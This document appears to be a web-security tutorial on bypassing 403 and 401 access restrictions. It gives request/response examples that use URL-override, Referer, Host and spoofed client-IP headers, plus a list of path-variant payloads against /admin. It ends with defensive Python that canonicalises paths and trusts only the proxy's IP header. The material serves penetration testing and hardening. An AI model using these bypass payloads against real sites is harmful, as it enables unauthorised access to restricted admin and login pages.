Scan the host's ports to find other ports with web services open, then access them.
Modify the Host header, changing its value to a subdomain or an IP address, to bypass the restriction.
Override the request URL: try the X-Original-URL and X-Rewrite-URL headers to bypass the web server's restriction.
Request:
GET /auth/login HTTP/1.1

Response:
HTTP/1.1 403 Forbidden

Request:
GET / HTTP/1.1
X-Original-URL: /auth/login

Response:
HTTP/1.1 200 OK

or

Request:
GET / HTTP/1.1
X-Rewrite-URL: /auth/login

Response:
HTTP/1.1 200 OK

Referer header bypass
Try the Referer header to bypass the web server's restriction.
Background: the Referer request header carries the address of the page from which the current request originated, i.e. it indicates that the current page was reached through a link on that source page. Servers commonly use the Referer header to identify where a visit came from.
Request:
GET /auth/login HTTP/1.1
Host: xxx

Response:
HTTP/1.1 403 Forbidden

Request:
GET / HTTP/1.1
Host: xxx
ReFerer: https://xxx/auth/login

Response:
HTTP/1.1 200 OK

or

Request:
GET /auth/login HTTP/1.1
Host: xxx
ReFerer: https://xxx/auth/login

Response:
HTTP/1.1 200 OK

Proxy IP
Developers commonly restrict access to an interface by having the Nginx proxy identify the client's IP address; try headers such as X-Forwarded-For and X-Forwarded-Host to bypass the web server's restriction.
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
Example:
Request:
GET /auth/login HTTP/1.1

Response:
HTTP/1.1 401 Unauthorized

Request:
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1

Response:
HTTP/1.1 200 OK

Extension bypass
Based on the extension (path variants), used to bypass 403-restricted directories.
site.com/admin => 403
site.com/admin/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/admin/..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ => 200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200
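All of the tricks above (override headers, client-supplied IP headers, Referer, and the path variants) work only when the access check runs on something the client controls. The following is an added defender-side example, not code from the original post, showing an access decision that canonicalises the request-line path and believes only the trusted proxy's X-Forwarded-For entry; the proxy address, allowlist and restricted prefixes are assumptions.

```python
from urllib.parse import unquote

# Assumed deployment: one reverse proxy at TRUSTED_PROXY appends the real
# client IP to X-Forwarded-For; /admin and /auth/login are reachable only
# from ADMIN_ALLOWLIST. All three values are constructed for this example.
TRUSTED_PROXY = "10.0.0.5"
ADMIN_ALLOWLIST = {"10.0.0.20"}
RESTRICTED = ("/admin", "/auth/login")


def canonical_path(raw_path: str) -> str:
    """Collapse the path variants from the list above into one form."""
    path = unquote(raw_path.split("?", 1)[0])   # drop query; decode %2f %2e %20 %09
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0].strip(" \t")  # drop ;params and tab/space padding
        if seg in ("", "."):
            continue                             # handles '//' and '/./'
        if seg == "..":
            if segments:
                segments.pop()                   # resolve '..' like the backend would
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def client_ip(peer_ip: str, headers: dict) -> str:
    """Only the entry our own proxy appended to X-Forwarded-For is believed;
    X-Client-IP, X-Custom-IP-Authorization and friends are never consulted."""
    if peer_ip != TRUSTED_PROXY:
        return peer_ip                           # direct hit: header values are untrusted
    xff = headers.get("x-forwarded-for", "")
    hops = [h.strip() for h in xff.split(",") if h.strip()]
    return hops[-1] if hops else peer_ip         # last hop was written by our proxy


def authorize(request_path: str, headers: dict, peer_ip: str) -> bool:
    """Decide on the canonical request-line path only: X-Original-URL,
    X-Rewrite-URL, Host and Referer play no part in the decision."""
    headers = {k.lower(): v for k, v in headers.items()}
    path = canonical_path(request_path)
    restricted = any(path == p or path.startswith(p + "/") for p in RESTRICTED)
    if not restricted:
        return True
    return client_ip(peer_ip, headers) in ADMIN_ALLOWLIST
```

With this in place, the variants in the list all resolve to /admin (or to / for the `..;/` forms) before the check, and a spoofed first X-Forwarded-For entry is ignored because the proxy's own entry is last.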
Reference: https://www.wangan.com/articles/2483